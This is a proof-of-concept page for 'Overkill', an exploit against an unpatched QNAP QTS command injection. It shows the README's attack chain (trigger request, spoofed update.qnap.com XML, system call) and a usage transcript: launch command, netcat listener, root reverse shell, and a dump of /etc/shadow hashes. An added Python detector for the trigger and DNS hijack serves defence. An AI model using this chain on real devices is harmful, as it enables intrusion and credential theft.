
CVE-2020-2509 PoC — Qnap Systems QNAP QTS and QNAP Systems QuTS hero command injection vulnerability

Source
Associated Vulnerability
Title: Qnap Systems QNAP QTS and QNAP Systems QuTS hero command injection vulnerability (CVE-2020-2509)
Description: Qnap Systems QNAP QTS is a data storage device from the Chinese company Qnap Systems with a SAN-like storage architecture; it supports protection features such as tiered storage and mirroring. QNAP Systems QuTS hero is a NAS operating system for file management from the Chinese company QNAP Systems; it retains the QTS application ecosystem and integrates the more powerful 128-bit ZFS file system to give enterprises a more stable and reliable NAS storage solution. QTS and QuTS hero contain a command injection vulnerability: an attacker who exploits it can execute arbitrary commands in a compromised application.
Description
QNAP N-Day (Probably not CVE-2020-2509)
Readme
# Overkill

Overkill is an exploit for a patched vulnerability affecting QNAP QTS. Due to the way QNAP discloses vulnerabilities, I'm unsure if this issue has a CVE or not. However, it was likely patched in November 2020 and April 2021. The n-day was "discovered" while doing diff analysis for CVE-2020-2509. This is almost certainly not CVE-2020-2509. 

The exploit will send HTTP GET requests to `/cgi-bin/qnapmsg.cgi?lang=xxx` which will cause unpatched QNAP devices to download an XML file from `update.qnap.com` via insecure HTTP. An attacker that can redirect `update.qnap.com` to themselves can respond with an attacker controlled XML file. When the QNAP parses the XML file it will pass some of the contents to a `system` call, resulting in a reverse shell.

This exploit *does not* implement the method to get `update.qnap.com` requests directed to the exploit. In the example below, I was using router DNS hijacking on my own router... your mileage may vary.
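As an added example, not part of the Overkill project or this page's own code, the following Python detector flags the two observable stages of the chain described above: the inbound trigger request to `/cgi-bin/qnapmsg.cgi`, and a DNS answer that points `update.qnap.com` at a non-global address, which is what a DNS hijack of the update host looks like in a resolver log. The common-log-format access lines and the DNS answer tuples are constructed for the example.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical detector (not Overkill's code). Stage 1: a GET to the
# qnapmsg.cgi endpoint with a lang parameter makes an unpatched NAS fetch
# /loginad/qnapmsg_<lang>.xml from update.qnap.com over plain HTTP.
TRIGGER_PATH = "/cgi-bin/qnapmsg.cgi"
UPDATE_HOST = "update.qnap.com"

# Common log format, as in the README's HTTP server output.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample records, not captured from a real device.
SAMPLE_ACCESS_LOG = [
    '10.12.70.252 - - [27/Jul/2022 11:58:20] "GET /cgi-bin/qnapmsg.cgi?lang=eng HTTP/1.1" 200 -',
    '10.12.70.10 - - [27/Jul/2022 11:59:01] "GET /cgi-bin/login.html HTTP/1.1" 200 -',
    '10.12.70.10 - - [27/Jul/2022 12:00:05] "POST /cgi-bin/qnapmsg.cgi?lang=eng HTTP/1.1" 200 -',
]
SAMPLE_DNS_ANSWERS = [
    ("update.qnap.com", "10.12.70.252"),  # hijacked: answer is a LAN address
    ("update.qnap.com", "1.2.3.4"),       # constructed public answer, not flagged
    ("www.qnap.com", "10.0.0.5"),         # different name, ignored
]


def parse_access_line(line):
    """Parse one common-log-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def flag_trigger_requests(lines):
    """Return (src, timestamp, lang) for every GET that hits the trigger endpoint."""
    hits = []
    for line in lines:
        rec = parse_access_line(line)
        if rec is None or rec["method"] != "GET":
            continue
        parts = urlsplit(rec["target"])
        if parts.path != TRIGGER_PATH:
            continue
        lang = parse_qs(parts.query).get("lang", [""])[0]
        hits.append((rec["src"], rec["ts"], lang))
    return hits


def flag_hijacked_update_answers(answers):
    """Return (name, ip) for answers that resolve update.qnap.com to a non-global address."""
    return [(name, ip) for name, ip in answers
            if name.rstrip(".").lower() == UPDATE_HOST
            and not ipaddress.ip_address(ip).is_global]
```

A trigger hit alone may be legitimate traffic to the endpoint; a trigger hit on a NAS whose resolver also returned a private address for `update.qnap.com` is the combination worth alerting on.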

## Usage Example

```
albinolobster@ubuntu:~/overkill$ sudo python3 overkill.py --rhost 10.12.70.251 --lhost 10.12.70.252

01001001001000000110001101100001011011100010011101110100001000000110011101100101
    ______  ___      ___  _______   _______   __   ___   __    ___      ___ 
   /    " \|"  \    /"  |/"     "| /"      \ |/"| /  ") |" \  |"  |    |"  |
  // ____  \\   \  //  /(: ______)|:        |(: |/   /  ||  | ||  |    ||  |
 /  /    ) :)\\  \/. ./  \/    |  |_____/   )|    __/   |:  | |:  |    |:  |
(: (____/ //  \.    //   // ___)_  //      / (// _  \   |.  |  \  |___  \  |___
 \        /    \\   /   (:      "||:  __   \ |: | \  \  /\  |\( \_|:  \( \_|:  \
  \"_____/      \__/     \_______)|__|  \___)(__|  \__)(__\_|_)\_______)\_______)

01110100001000000111010001101111001000000111001101101100011001010110010101110000

                                🦞 jbaines-r7

[+] Forking a netcat listener
[+] Using /usr/bin/nc
Listening on 0.0.0.0 1270
[+] Spinning up HTTP server
[!] Attempting http://10.12.70.251:8080/cgi-bin/qnapmsg.cgi?lang=eng
[+] Received an HTTP request from 10.12.70.251 on 27/Jul/2022 11:58:23
[*] Requested /loginad//qnapmsg_eng.xml
10.12.70.251 - - [27/Jul/2022 11:58:23] "GET /loginad//qnapmsg_eng.xml HTTP/1.1" 200 -
Connection received on 10.12.70.251 44630
bash-3.2# uname -a
uname -a
Linux NAS4A32F3 4.2.8 #1 SMP Sun Nov 8 01:50:48 CST 2020 aarch64 GNU/Linux
bash-3.2# id
id
uid=0(admin) gid=0(administrators)
bash-3.2# cat /etc/shadow
cat /etc/shadow
admin:!$1$5pFeLUat$D8jTQogWJy0HF3XjkD13q/:19181:0:99999:7:::
guest:$1$$ysap7EeB9ODCrO46Psdbq/:14233:0:99999:7:::
httpdusr:!:19181:0:99999:7:::
albinolobster:$1$cZCC65z5$NXtIBB4hgqzVG.PHyShKh1:19195:0:99999:7:::
[sshd]:!:19181:0:99999:7:::
bash-3.2# exit  
```

## Credit

* [Overkill](https://www.youtube.com/watch?v=vB_IynOTQU0) by Lazlo Bane featuring Colin Hay

File Snapshot

```
[4.0K] /data/pocs/fc70c1e3a2e947bf13e9d8c2cb8134af2e2495a3
├── [1.5K] LICENSE
├── [4.8K] overkill.py
└── [2.8K] README.md

0 directories, 3 files
```